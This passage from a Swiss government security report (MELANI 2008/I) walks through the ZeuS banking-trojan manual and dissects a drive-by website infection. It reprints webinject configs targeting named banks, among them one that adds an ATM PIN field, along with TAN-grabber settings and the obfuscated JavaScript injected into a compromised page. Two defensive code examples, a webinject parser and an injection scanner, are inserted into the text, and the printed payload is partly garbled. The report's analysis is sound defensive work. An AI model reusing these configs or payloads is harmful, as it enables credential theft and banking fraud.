any software sold on the commercial market and is written in PHP with a MySQL database. This
allows it to be used by many different individuals with different privileges and needs.

            1.    Requires PHP + MySQL.
            2.    Simple installation (usually it is sufficient to enter the MySQL user data and click the "Install"
                  button).
            3.    Multi-user management; each user can be granted specific access rights.
            4.    Statistics of installations (infections).
            5.    Statistics of bots online.
            6.    Division of the botnet into sub-botnets.
            7.    Overview of the bots online (filters also possible)
                  1. Viewing of screenshots in real time.
                  2. Viewing and checking of Sock4.
                  3. Online duration of the bot.
                  4. Connection speed (only for bots outside NAT).
            8.    Database storage of logs. This has the following advantages:
                  1. Search for logs by content filter.
                  2. Search for logs by templates in which the desired POST details are highlighted (for instance,
                     this makes it possible to extract only the login and password for the website http://rambler.ru/,
                     with all other data omitted in the search).
            9. Storage of logs in encrypted files, in a directory structure: Botnet\Country\Computer ID.
            10. Issuing of commands to the bots (filters also possible).
            11. If you have PHP skills, you can redesign the control panel yourself to your taste.

   3. The builder:

Point 5 is especially interesting: the developers refer to polymorphic encryption, which
generates a new version of the Trojan horse each time and thus makes the bot difficult for
anti-virus programmes to recognize.

            1.    Written in VC++ 8.0 without using the RTL etc., in pure WinAPI, which results in a small size
                  (depends on the build; for a build with log decoder the size is more than 400 KB, since a country
                  database by IP number is included).
            2.    Status overview of the running system; to test the bot, you can start it on your own computer
                  and then delete it at the press of a key.
            3.    Log decoder, organized by country.
            4.    Builder for the configuration file (encrypted) and for the bot itself.
            5.    Polymorphic encryption, BETA. Currently in the test stage and does not guarantee one hundred
                  percent protection against anti-virus software. Completion of this function in the near future
                  is, however, assured.



Installation of the bot

The following chapter describes the installation of the control panel on a server. As the
explanations below show, common PHP-based content management systems such as
Wordpress, Typo3, and Textpattern are used as models. It suffices to set appropriate write
privileges in the directories (chmod 777) and start the installation via index.php. A series of
parameterizations follows, such as password, server addresses, and so on.

   1.    The server should have at least the following software preinstalled: Apache, any version; PHP version 4
         or higher; MySQL version 4 or higher. Usually these programs are already installed on the server;
         otherwise contact the server's support service.
   2.    Copy the contents of the 'web' folder from your software package into any (preferably new) directory of
         your choice on the server that you can access via the HTTP protocol.
   3.    If the server runs on a *nix system (Linux, FreeBSD etc.), set the permissions 0777 (chmod) on the
         'system' directory.
   4.    Call the script 'install/index.php' via HTTP (e.g. http://bot.net/zeus/.install/index.php); the installation
         script should then start. If this does not happen, the server may not be set up correctly.
   5.    Provide all the information requested by the script.
           1. Root login: login and password for the administrator of the control panel being created.
           2. MySQL server: details for MySQL use. The specified user must already exist, but the specified DB
                 is created automatically if it does not exist (the rights to create databases must be granted).
           3. MySQL tables: table names in the MySQL DB. Should be changed in case of masking.
           4. Local paths: local hard disk paths relative to the installation directory.
           5. Options: additional options (can be changed in the control panel after installation).
                        Enable log write to database: write logs from infected computers to the DB? This
                        method makes it possible to run search queries directly from the control panel, but it
                        requires more server resources.
                   1. Enable log write to local path: write logs from infected computers to files? The files are
                        encrypted and can only be viewed after decryption by the builder.
                   2. Online bot timeout: timeout of the bots online; depending on the server, it should be 0-5
                        minutes more than the TIMER_STATS value in the bot configuration. Recommended value:
                        TIMER_STATS plus 5 minutes.
   6.    Click the 'Install' button; the installation may take up to a minute (the country database by IP number
         is populated).
   7.    If the installation was successful, you can delete the '.install' directory and go directly to the control
         panel. If errors occur during the installation, check that the data was entered correctly; the PHP and
         MySQL settings may also need to be checked, and in addition you can contact ZeuS technical support.



Configuration:

The developers split the configuration into a static and a dynamic part. The static part contains
parameters such as timers and the URL for renewing the configuration file. The dynamic part
contains parameters that secure the robustness of the network and allow attack targets to be
switched quickly. These include the URLs from which updated versions can be downloaded and
installed, if desired also from different locations (backup). If one of the addresses is
discovered and shut down by the police, the bot uses an alternative address and downloads
an updated version. This part also contains the URL to which the stolen data is sent
(dropbox) and the alternative URLs from which the configuration file can be downloaded.
Finally, it also contains the file with the webinjects (see below).

The file consists of the two sections StaticConfig and DynamicConfig.

StaticConfig: the values of this section are written directly into the bot file, i.e. the exe file; they define the
basic behaviour of the bot on the victim's computer.
Depending on your package build, some of the parameters may be of no significance to you; all significant
parameters are set out in the example included with the software package.

      •     botnet [line] – defines the name of the botnet to which the bot belongs.
            line – name of the botnet, up to 4 characters, or 0 for the default value.

            Recommended value: botnet 0

      •     timer_config [value1] [value2] – determines the interval within which the update of the
            configuration file is to be received.
            value1 – determines the time in minutes within which the configuration file is to be updated if it
            was loaded successfully the last time.
            value2 – determines the time in minutes within which the configuration file is to be updated if
            errors occurred during the last load.

            Recommended value: timer_config 60 5

      •     timer_logs [value1] [value2] – determines the interval within which the accumulated logs are to be
            sent to the server.
            value1 – determines the time in minutes within which the logs are to be sent if the last
            transmission was successful.
            value2 – determines the time in minutes within which the logs are to be sent if errors occurred
            during the last transmission.

            Recommended value: timer_logs 2 2

      •     timer_stats [value1] [value2] – determines the interval within which the statistics are to be sent to
            the server (this includes the installations, the bots online, open ports of the Socks services,
            screenshots etc.).
            value1 – determines the time in minutes within which the statistics are to be sent if the last
            transmission was successful.
            value2 – determines the time in minutes within which the statistics are to be sent if errors
            occurred during the last transmission.

            Recommended value: timer_logs 20 10




      •     url_config [url] – URL of the main configuration file; this is the most important parameter; if the
            configuration file is not available at the specified URL when the victim's computer is infected, the
            infection is pointless.

      •     url_compip [url] [value] – specifies the website used to check the bot's own IP; serves to detect
            NAT.
              url – specifies the URL of the website
              value – specifies the number of bytes that is sufficient to download in order to recognize its own
            IP in the download.

      •     blacklist_languages [value1] [value2]...[valueX] – defines the list of Windows language codes for
            which the bot should always remain in sleep mode, i.e. it will send no logs and no statistics, but will
            still contact the configuration file.
               valueX – language code, for example for RU: 1049, EN: 1033.

DynamicConfig, the values in this section are written into the final configuration file. Depending on your package
composition, some of the parameters may be without significance to you; all important parameters are explained
in the example included with the software package.

      •     url_loader [url] – specifies the URL from which an upgrade of the bot can be downloaded. This
            parameter is only relevant if you have sent a new bot version into the botnet and overwritten its
            configuration via the same URL as the old configuration; in this case the old bot versions begin to
            update themselves via the file specified in this entry.

      •     url_server [url] – specifies the URL via which statistics, files, logs etc. are sent from the victims'
            computers.

      •     file_webinjects – specifies the local file containing the list of webinjects. A description of the
            format of this file can be found here.

Subsection AdvancedConfigs – contains the list of URLs from which a backup configuration file can be
downloaded if the main file is unavailable. It is advisable to enter 1-3 URLs in this subsection; this can save
the botnet from destruction if the main file is unavailable, after which it can be transferred to another server
at leisure. Files need not necessarily be present at the specified URLs; the point is rather that files can be
placed at these URLs later. The files should only be placed once the unavailability of the main configuration
file has been established. If you wish to always keep files ready at these URLs, you must always update them
at the same time as the main configuration file. The backup files do not differ in any way from the main file
and are created in the same way.



URL redirects:

Using concrete examples for purposes of simplification, this chapter describes the
functioning of the URL redirects.

The list of URL redirects (hereinafter "fakes") is given in the WebFakes subsection of the DynamicConfig
section.

Entry format: [original URL] [new URL] [switches] [blackmask POST] [whitemask POST]
[blocking URL]

      •     original URL – the URL to be changed; a mask can be used.

      •     new URL – = fake: the URL to be called instead of the original URL.

      •     switches – determine the main condition of the call; may consist of several switches in any
            order, but upper/lower case is significant [case-sensitive]. The following switches are currently
            available:
                 o P – load the new URL on a POST request to the original URL.
                 o G – load the new URL on a GET request to the original URL.
                 o S – load the new URL while retaining the path.

                   This switch allows "scam sites" to be used freely as ordinary "fake sites"; see further
                   below for details.

      •     blackmask POST – mask of the POST data passed to the new URL in whose presence the fake site is
            not loaded. Usually the fields contained in the fake site are specified here; this prevents the
            fake site from referring to itself in an endless loop. If there is no need to fill in this field, it
            can be left empty or filled with the character *.

      •     whitemask POST – mask of the POST data passed to the new URL in whose presence the fake site is
            loaded, i.e. if the POST data does not match this mask, the fake site is not loaded. This field is
            rather rarely used in practice; leave it empty or fill it with the character * so that it is ignored.

      •     blocking URL – if your URL redirect is to be loaded only once on the victim's computer, a URL mask
            must be specified here; once it is called, the URL redirect in question is no longer used on that
            computer. If you do not need it, leave this field empty.

Loading algorithm of the URL redirect:

      1.    Search for the URL loaded by the victim in the configuration file.
      2.    Check of the switches.
      3.    Check for matches with the blackmask.
      4.    Check for matches with the whitemask.
      5.    Call of the new URL.

Use of the "S" switch:

This switch is mostly used to hand control over to the "scam site". When the switch is set, the new URL must be
the base URL of the "scam site"; the bot appends to the end of the new URL the part of the path from the real
URL that begins after the last slash (characters: "\", "/") of the matching original URL.

Examples:

entry webfakes

      •     http://*.rambler.ru* http://yandex.ru GP * *
            Whichever page on rambler.ru the victim tries to open, the main page of yandex.ru is always loaded.

      •     http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "*&mailtan=*" *
            Example of a "transitional" fake containing the field "mailtan". The fake site is loaded on POST
            requests in which "mailtan" does not occur; therefore, after the fake has been processed, the
            victim reaches his e-mail normally.

      •     http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "*&mailtan=*" "*login=*"
            Example of a "transitional" fake containing the field "mailtan". The fake site is loaded on POST
            requests in which "mailtan" does not occur but "login" does.

end




Webinjects:

What follows is a description of the format used for webinjects. Webinjects are pieces of
HTML code that are inserted into the original web pages or replace parts of them.
“Data_before” defines the line of code preceding the modification, and “data_after”
defines the end of the modification.

                                                                                                                        38/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

For convenience of writing, webinjects are placed in a separate file, which is specified in the configuration
file as DynamicConfig.file_webinjects. Naturally, once the final configuration file has been created, no
additional files are generated.

The file consists of a list of URLs, for each of which an unlimited number of webinjects may be specified; the
URL to be modified is given on one line according to the rules of the configuration file: set_url [URL]
[switches] [blackmask POST] [whitemask POST], where the last two parameters are optional.



      •     URL – the URL to which the webinject is to be applied; a mask may be used.

      •     Switches – determine the main condition of invocation; may consist of several switches in any
            order, but upper and lower case are distinguished [case-sensitive]. Currently the following
            switches are available:
                 o P – execute the webinject on a POST request to the URL.
                 o G – execute the webinject on a POST request to the URL [sic; translator's note].
                 o L – changes the purpose of the webinject; when this switch is set, the desired data
                     excerpt is captured and immediately stored in the log.

      •     Blackmask POST – mask of the POST data passed to the URL whose presence causes the
            webinject not to be executed.

      •     Whitemask POST – mask of the POST data passed to the URL whose presence causes the
            webinject to be executed.

Starting on the line after the URL follows the list of webinjects, which extends to the end of the file or to the
specification of a new URL by a further set_url entry. A webinject consists of three elements:

      •     Without switch L:
               o data_before – mask of the data after which the new data is to be written.
               o data_after – mask of the data before which the new data is to be written.
               o data_inject – new data that replaces whatever lies between data_before and data_after.

      •     With switch L:
                 o data_before – mask of the data after which the excerpt of data to be captured begins.
                 o data_after – mask of the data before which the excerpt of data to be captured ends.
                 o data_inject – serves as the header for the data to be captured and is used only for
                    visual highlighting in the logs.

Examples:

    set_url https://www.e-gold.com/acct/balance.asp* GPL
    data_before
    <form name=fiat*</form>
    data_end
    data_inject
    data_end
    data_after
    <th colspan=4 align=left valign="bottom"
    data_end

    set_url https://online.wellsfargo.com/das/cgi-bin/session.cgi* GL
    data_before
    <div id="pageIntro" class="noprint">
    data_end
    data_inject
    data_end
    data_after
    <td id="sidebar" align="left" valign="top" class="noprint">
    data_end

    set_url https://www.wellsfargo.com/* G
    data_before
    <span class="mozcloak"><input type="password"*</span>
    data_end
    data_inject
    <br><strong><label for="atmpin">ATM PIN</label>:</strong>&nbsp;<br />
    <span class="mozcloak"><input type="password" accesskey="A" id="atmpin" name="USpass" size="13" maxlength="14" style="width:147px" tabindex="2" /></span>
    data_end
    data_after
    data_end
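The webinject file format described above, as an added example that is not part of the report or of the ZeuS manual: a small parser of the kind an analyst writes to inventory which URL masks an extracted configuration targets and whether each entry injects markup or only logs a captured fragment (switch L). The function names and the sample file (with .test hostnames and a placeholder inject) are this example's own constructions.

```javascript
// Added example, not code from the MELANI report or the ZeuS manual: parses the
// set_url / data_before / data_inject / data_after / data_end layout described
// above into plain objects. Sample input below is constructed (.test hosts).

const SAMPLE_WEBINJECTS = [
  'set_url https://www.example-bank.test/acct/balance.asp* GPL',
  'data_before',
  '<form name=fiat*</form>',
  'data_end',
  'data_inject',
  'data_end',
  'data_after',
  '<th colspan=4 align=left valign="bottom"',
  'data_end',
  '',
  'set_url https://www.example-bank.test/* G *pwd=* *login=*',
  'data_before',
  '<input type="password"*',
  'data_end',
  'data_inject',
  '<!-- constructed placeholder for injected markup -->',
  'data_end',
  'data_after',
  'data_end',
].join('\n');

const SECTION_NAMES = ['data_before', 'data_inject', 'data_after'];

function parseWebinjects(text) {
  const entries = [];
  let current = null;   // entry opened by the most recent set_url line
  let section = null;   // name of the data_* block being collected
  let buffer = [];
  let block = null;     // partially built {before, inject, after}

  const lines = text.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];
    const trimmed = line.trim();

    if (section !== null) {
      if (trimmed === 'data_end') {
        block[section.slice(5)] = buffer.join('\n'); // 'data_before' -> 'before'
        buffer = [];
        section = null;
        // An inject is complete once all three parts have been seen.
        if (['before', 'inject', 'after'].every((k) => k in block)) {
          current.injects.push(block);
          block = null;
        }
      } else {
        buffer.push(line); // masks and markup are kept verbatim
      }
      continue;
    }

    if (trimmed === '') continue;

    if (trimmed.startsWith('set_url')) {
      if (block !== null) throw new Error(`line ${i + 1}: set_url inside an unfinished inject`);
      const parts = trimmed.split(/\s+/);
      if (parts.length < 3) throw new Error(`line ${i + 1}: set_url needs a URL and switches`);
      const switches = parts[2];
      current = {
        url: parts[1],
        switches,
        blackmask: parts[3] || '*',   // optional per the format description
        whitemask: parts[4] || '*',
        onPost: switches.includes('P'),
        mode: switches.includes('L') ? 'log' : 'inject',
        injects: [],
      };
      entries.push(current);
      continue;
    }

    if (SECTION_NAMES.includes(trimmed)) {
      if (current === null) throw new Error(`line ${i + 1}: ${trimmed} before any set_url`);
      if (block === null) block = {};
      if (trimmed.slice(5) in block) throw new Error(`line ${i + 1}: duplicate ${trimmed}`);
      section = trimmed;
      continue;
    }

    throw new Error(`line ${i + 1}: unexpected text outside a data block: ${trimmed}`);
  }
  if (section !== null || block !== null) throw new Error('file ends inside an unfinished inject');
  return entries;
}

// One line per entry: mode, switches, target mask and number of injects.
function summarize(entries) {
  return entries.map((e) => `${e.mode.padEnd(6)} ${e.switches.padEnd(4)} ${e.url} (${e.injects.length} inject(s))`);
}

console.log(summarize(parseWebinjects(SAMPLE_WEBINJECTS)).join('\n'));
```

The parser is strict on purpose: text outside a data block, a set_url inside an unfinished inject, or a file that ends mid-inject raises an error with the line number, so a damaged or truncated dump is noticed rather than silently producing a short target list.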



TAN grabber:

The last chapter of the user manual is dedicated to the function of the TAN grabber
(Transaction Authentication Number). The example refers to an online banking address.

List of the TAN grabber's settings; stored in the TanGrabber subsection of the DynamicConfig section.

        •     Entry format: [URL mask] [switches] [whitemask POST] [blackmask POST] [name of the value]

        •     URL mask – URL on transition to which the TAN is to be searched for in the POST data.

        •     Switches – determine the main condition for capturing the TAN; may consist of several switches
              in any order, but upper and lower case are distinguished [case-sensitive]. Together they allow
              a more precise identification of the TAN. Currently the following switches are available:
                   o Sxx – specifies after how many skipped TANs the TAN must be replaced. xx – a number
                       between 1 and 99 giving this count.
                   o Rxx – specifies that the name of the TAN in the POST data is variable and makes it
                       possible to locate the TAN by position. xx – a number between 1 and 99 giving this
                       position.
                   o Cxx – specifies the number of digits in the TAN. xx – a number between 1 and 9.

        •     Whitemask POST – mask of the POST data passed to the URL whose presence causes the TAN
              grabber to be executed.

        •     Blackmask POST – mask of the POST data passed to the URL whose presence causes the TAN
              grabber to be executed.

        •     Name of the value – if you have not set the switches R or C, the name of the variable in the
              POST data that contains the TAN must be given here without fail; a mask may be used.

Functional algorithm of the TAN grabber:

   1.       Look up the URL in the configuration file.
   2.       Check the POST data.
   3.       Check the value of switch S.
   4.       Search for the variable containing the TAN.
   5.       Store the TAN.
   6.       Replace the TAN in the POST data and continue executing the request.

Examples:

entry tangrabber

        •     https://banking.*sparkasse*.de/cgi/login.cgi S3 * tan

end



The description of various aspects of the installation and use of ZeuS makes clear that this
software can also be used by persons without special expertise. Anyone who has ever used
a PHP or MySQL application will recognize extensive similarities. This corresponds to the
professionalization concept of the actors: one group develops the software and offers it for
purchase on the black market. Another group generates malware and uses the software to
distribute it and build up a botnet – for instance via spam e-mails. This botnet is then rented
by a third group to attack e-banking systems and recruit money mules. All three actors have
one thing in common: they are engaged in a criminal activity to enrich themselves financially.




10.2 Drive-by Infections: What They Are and How They Work
MELANI has reported drive-by infections in the semi-annual reports of 2007/1 and 2007/2
and also covered the topic of prevention from the perspectives of the users and the website
administrators. Over the last year, the threat from drive-by infections has further increased.
This appendix offers a detailed explanation of how an infection occurs using an anonymized
Swiss example.

Definition

Drive-by infections are a means of spreading malware that attacks users simply through
their surfing habits; the user may not even notice that it is happening. As a rule, the goal of
the malware authors is to gain access to end users' computers. The term “drive-by” infection is
an Americanism that refers to the convenience of consuming by car (hence “drive-by” shopping,
“drive-by” fast-food restaurants or “drive-by” cinemas), used here as a metaphor for surfing
the Internet. Drive-by attacks usually involve the malware authors abusing third-party
websites by planting additional malicious elements into the website code.

The infection

There are several ways of infecting websites with malicious code. Applications based on
PHP often contain vulnerable components that allow attackers to access the operating
system or the file system. The web server itself may also contain such vulnerabilities.
Exploiting them allows attackers to manipulate web contents and inject additional code.
Another way of changing web contents is the misuse of FTP login data used for the
administration of websites: the computer from which the website is administered is
infected with a Trojan, which in turn steals the access data. The attacker uses the stolen
passwords to log in and to supplement the website code with malicious functions. Such
manipulations are carried out either manually by the attacker or automatically by a bot.

The following excerpt of FTP log files (Illustration 1) illustrates such an attack. The analysis
shows that not just one but three uploads of malicious components took place, namely on
4 March 2008, 20 March 2008 and 28 April 2008. The IP addresses in this case were
registered in Canada and the United States. This was most probably an automated attack.
The IP addresses refer only to proxy or botnet computers, not to the attackers themselves.

2008-03-04 11:49:42 68.148.9.86 xyz 21 [24236]USER xyz 331 0 0 0
2008-03-04 11:49:42 68.148.9.86 xyz 21 [24236]PASS - 230 0 0 15
2008-03-04 11:49:53 68.148.9.86 xyz 21 [24236]sent /xyz/index.html 426 0 0 110
2008-03-04 11:49:53 68.148.9.86 xyz 21 [24236]sent /xyz/index.html 226 588 0 1031
2008-03-04 11:50:20 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 426 0 0 125
2008-03-04 11:50:20 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 963 0 953
2008-03-04 11:50:33 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 0 0 0
2008-03-04 11:50:33 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 0 0 0
2008-03-04 11:50:36 68.148.9.86 xyz 21 [24236]created Main_Frame.htm 226 0 4127 1844
2008-03-20 07:52:01 74.138.129.195 xyz 21 [45992]USER xyz 331 0 0 0 - -
2008-03-20 07:52:05 74.138.129.195 xyz 21 [45992]PASS - 230 0 0 16 - -
2008-03-20 07:52:38 74.138.129.195 xyz 21 [45992]sent /xyz/index.html 226 588 0 172 - -
2008-03-20 07:52:50 74.138.129.195 xyz 21 [45992]sent /xyz/Left_Frame.htm 226 5875 0 328 - -
2008-03-20 07:53:07 74.138.129.195 xyz 21 [45992]created Left_Frame.htm 226 0 6975 3515 - -
2008-04-28 07:43:30 24.127.176.63 xyz 21 [19408]USER xyz 331 0 0 0 - -
2008-04-28 07:43:34 24.127.176.63 xyz 21 [19408]PASS - 230 0 0 16 - -
2008-04-28 07:44:06 24.127.176.63 xyz 21 [19408]sent /xyz/index.html 226 588 0 109 - -
2008-04-28 07:44:20 24.127.176.63 xyz 21 [19408]sent /xyz/Left_Frame.htm 226 3687 0 234 - -
2008-04-28 07:44:37 24.127.176.63 xyz 21 [19408]created Left_Frame.htm 226 0 6971 3359
--
Illustration 1: Excerpt of the FTP log files of a compromised server



The injected code

To make analysis more difficult, the injected code in this example was written in such a
convoluted way that it was very hard to understand but still functioned (obfuscation). To
analyze the code, it must therefore first be brought into an understandable form (de-obfuscation).
While this kind of obfuscation is also used by JavaScript programmers to protect their
intellectual property, in this example it is clearly used to prevent administrators and
investigators from understanding the full functionality of the code. In Illustration 2, the original
HTML code is marked green and the added code red. The added code consists of a very
long JavaScript string, $=“[…]”. For better readability, line breaks were inserted in
Illustration 2. In the final line this string is “unescaped” (decoded) and the result is
passed to the “document.write” method, which then hands the code to the web
browser for execution. In plain text, the only code one sees is:

eval(unescape($));document.write($);

For those websites with little or no JavaScript, such code fragments may suffice as a warning
sign. For more complex websites, however, such code may no longer be conspicuous. Since
the entire JavaScript code is contained in a single long line, it is often only recognized by
webmasters once a visitor has reported an infection.



<html>
<head>
<title>Widgets Info Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head>

<body bgcolor="#000000" background="Images/Top_Widget.jpg">
<div align="center">
  <p><img src="Images/Left_Widget.jpg" width="680" height="444" usemap="#Map2" border="0">
    <map name="Map2">
     <area shape="rect" coords="2,1,677,447" href="Frame_Left.htm" target="_self">
    </map>
    <br>
    <map name="Map">
     <area shape="rect" coords="5,6,397,511" href=Description_Main.htm" target="_self" alt="Description of Widgets"
title="Description of Widgets">

   </map>
  </p>
  <p><font face="Garamond" size="4"><b>Widget Overview</b></font></p>
  <p><b><font face="Garamond" size="4">Super New Widgets </font></b></p>
  <p>&nbsp; </p>
</div>
<script language="javascript">$="%63a%3d%22%2566u%256ectiax%256fn %2564c%2573(%2564s,e%2573){d %2573%253
du%256 ee%2573c%25ae61p%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7% 3c7tfu7%3 c7dxb7%3c7v yb7%3c7fy v7%3 c7
huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi 87q7%3c7 r7 %3c7s7%3c7t 7%3 c7u7
%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7| 7%we3c7}7%3c7~7 %3c7%257F7%3c7`7%3c 7a7%3qc7b7% 3c7c7%
3c7%2 2;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%25u22%2520%2520%279kd)K7di7M0-0%2522%2520%2520%27+m}^}-
S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888 d)K7i7 M6% 2520hQQ9;}^}9 50&5##95 0%2522&M+ iSx%2522|)K88 88d
)K7i7 M6 %2520h##!!9..#9;}^}950!%25209M +}Sa x%22;d c%3d%220 d)K7t 7M-t)%3ewudTqdu 89%3d8t)% 3ewudT qi899+yv8
d)K7t7M,%25209d)K7t7M-!+d) K7}7Mt )%3ewu d]%257F~d x89;!+ ve~ sdy %a 257F ~0S]^8t%3c}%3ci9kfqb0b-888i;8 #:t99;8}
Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%x3 257Fh% 3es%25 7F}7+f qb0iSx !%3ciSx %2522 %3c%22;de%3d%22-|)K88d) K7}7M;}^
}950%2522%259M+yv888d)K7t7 M:%25229.-%25209 6688d) K7t7M: %25229,-)99tSx-~)K8d)K7t7M50!%25209M54+u|cu0tSx-
|)K88d)K7t7M:&950%2522%279M+4-%3eb u`|qsu8t% 3ciSx%2522; }Sx w;iSx!;tSx;})Kd)K7} 7M%3d! M;7%3 es%257F }79+%2
2;cb% 3d% 22e(%2564s)%2 53bs t%253dt %256d %2570% 253d%252 7% 2527 ;for(i% 253d0;i%2 53cds.% 256caden% 22;d
z3d%22%2566u%256e%2563tioax%256e %2564 w%e252 8t){% 2563 a%2 53d %25 27%252564%2525 6f%252563u me%25
256et.%252577r%2569t%252565(%2525 22%25 27;c e%2 53d%2 527%252 522) %2 527;cb 253d%25 27%25253c scr%2525
69%252570t%25256ca%25256%2565g%25257%2535a%25256%2537e%25253d%25255c%2525%25322%256aa%2576a%2
52573c%2572%2569%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252fscrip%2574%2
5253e%2527;eval%2528une%2573ca%2570%2565(t%2529%2529%257d;%22;cd%3d%223ds%2574%252b%2553%2574rin
%2567.fr%256f%256dC%2568%2561rCo%2564e(%2528%2574mp.%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gf
w)6|``d.;;bqgx{l:w{y;xp;sfs;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;st%3d%22%2573t%253d%2522%253dst%253b%2564c
%2573(%2564%2561%252b%2564b%252b%2564%2563%252b%2564d%252b%2564e%252c1%2530)%253b%2564%2577(
%2573%2574)%253b%2573%2574%253d$%253b%2522%253b%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3
c7j79+fqb0~)-ug0Qbbqi8!%3c%2522%3c#%3 c$% 3c%25%3 c&%3c%2 7%3c (%3c) 9+fq b0d)-~ug0Qbbqi89+fqb0t)-~ug0 Tq
du8 9+d)K7i7Ma-t)%3ewudVe||Iuqb89+yv8t) %3ewu dTqi89.#9d) K7t7M-)%3 ewudTqd u8 9% 3d8t)% 3ewudTqi 89;% 25229 +
u|c u% 22;ce%3 d%22%2563har%2543o%256 4eA%2574( %25 30)^% 2528 %252 70%2 578%2 5300%2 527+e s))% 2tzr529
;}}%22;cc%3d%22%2567th;%2569++%2529{tm%2570%253dds.sl%2569c%2565(%2569,i%252b1%2529;s%2574%25%22;op
%3d%22%2524%253d%2522%2564w(%2564cs%2528cu,%25314)%2529;%2522;%22;cz%3d%22%2566%2575n%2563ti%25
6f%256ecz%2528c%257a){%2572et%2575rn%2520c%2561%252bcb+%2563%2563+%2563d+c%2565c%257a;}%253b%22;
%69%66(d%6fc%75%6den%74.%63o%6fki%65.%69nd%65xO%66%28%27vbul%6c%65%74in_%6dult%69qu%6fte%3d%27)
%3d%3d){sc(%27vbu%6c%6ce%74i%6e%5fnbmul%74iq%75ot%65%3d%27,%3 2,7)% 3b%aw65 va%6c(% 75nes%63ape%2
8dz+%63z+ %6fp%2b%73%74)a+%27d%77(d%7a+cz %28$+%73dt) %29%3b%2 7,3)} el%7 3e{%2 4%3d %27 %27} ;function
%20%73c(c%6em.-%2c%76,,eed%29%7bvar%20ex%64%3dnew %44at% 65();%6 5xd.a% 73 %65t D%61 t%6 55q(ex %64.%
67%65t%44a%74e()%2be%64)%3bdo%63ume%6et.%63oo%6bie%3dcnm%2b %27%3d%27aeesca% 70e(v w%29+ % 27%3
beaer43gfhsrmx%70ire%73%3sd%27+exd.to§%12GM%5afuqq%34%58 5wtz-4 wa4Str%69ng%28)%3b%7d;
";eval(unescape($));document.write($);</script></body>
</html>



Illustration 2: Excerpt: HTML code and JavaScript exploit
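The warning signs described before Illustration 2 (eval(unescape(…)) feeding document.write, and one extremely long single line of percent-escaped text) can be turned into a simple check a webmaster runs over the site's own HTML files. The following scanner is an added example and is not code from the report; the thresholds, the clean sample page and the stand-in for the injected block are this example's own constructed values.

```javascript
// Added example, not code from the MELANI report: flags <script> blocks that
// share the traits of the injection in Illustration 2. Thresholds and sample
// pages are constructed for this example.

const SIGNS = [
  { re: /eval\s*\(\s*unescape\s*\(/i, why: 'eval(unescape(...)) of a string' },
  { re: /document\.write\s*\(\s*\$\s*\)/i, why: 'document.write of the decoded string $' },
];
const LONG_LINE_CHARS = 400;   // constructed threshold for "one very long line"
const MANY_ESCAPES = 50;       // constructed threshold for %XX density

// Returns one finding per suspicious <script> block: the line it starts on and
// the reasons it was flagged. An empty array means nothing stood out.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const line = html.slice(0, m.index).split('\n').length;
    const reasons = [];
    for (const sign of SIGNS) {
      if (sign.re.test(body)) reasons.push(sign.why);
    }
    const longest = body.split('\n').reduce((max, l) => Math.max(max, l.length), 0);
    if (longest > LONG_LINE_CHARS) reasons.push(`single line of ${longest} characters`);
    const escapes = (body.match(/%[0-9a-f]{2}/gi) || []).length;
    if (escapes > MANY_ESCAPES) reasons.push(`${escapes} percent-escaped bytes`);
    if (reasons.length > 0) findings.push({ line, reasons });
  }
  return findings;
}

// Constructed clean page with an ordinary inline script.
const CLEAN_PAGE = [
  '<html><head><title>Widgets Info Page</title>',
  '<script type="text/javascript">',
  'function hide(id) { document.getElementById(id).style.display = "none"; }',
  '</script></head><body><p>Widget Overview</p></body></html>',
].join('\n');

// Constructed stand-in for the injected block: one long percent-escaped string
// handed to eval(unescape()) and document.write(), as in the report's excerpt.
const INJECTED = '<script language="javascript">$="' + '%61%62%63'.repeat(60) +
  '";eval(unescape($));document.write($);</script>';
const COMPROMISED_PAGE = CLEAN_PAGE.replace('</body>', INJECTED + '</body>');

console.log(JSON.stringify(scanHtml(CLEAN_PAGE)));        // []
console.log(JSON.stringify(scanHtml(COMPROMISED_PAGE)));  // one finding on line 4
```

Each reason is reported separately so that a site with legitimately long or escaped scripts can be tuned by raising one threshold without losing the eval(unescape) signal, which on a site with little JavaScript is the strongest indicator of the three.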


The actual malware is not stored directly in these data; instead, the data contain browser
instructions to obtain the malware from another server controlled by the criminals. The
attackers use a hidden HTML IFrame tag (see Illustration 1) for this purpose. The DNS name
of the location of this file is generated automatically and changed twice a week. In the
example in Illustration 3 below, this is http://annvxes.com. In this way, the malware can be
stored centrally in one or a few locations, while distribution takes place in a decentralized
way through numerous compromised websites. From the viewpoint of the criminals, this
approach increases flexibility, simplifies maintenance and lowers the risk of discovery.
Moreover, additional filters for distributing the malware can be implemented at these central
distribution sites, e.g. to limit the infection to specific countries, to serve malware to each
system only once, or to mask certain IP address ranges.




Illustration 3: A hidden IFrame initiates download of the malware



The JavaScript code also transmits information about the browser version and plug-ins
(Acrobat, Flash, etc.) used, upon which the server sends back a tailored malware for
execution.

One special feature of this script is that the domain varies with the date. Illustration 4
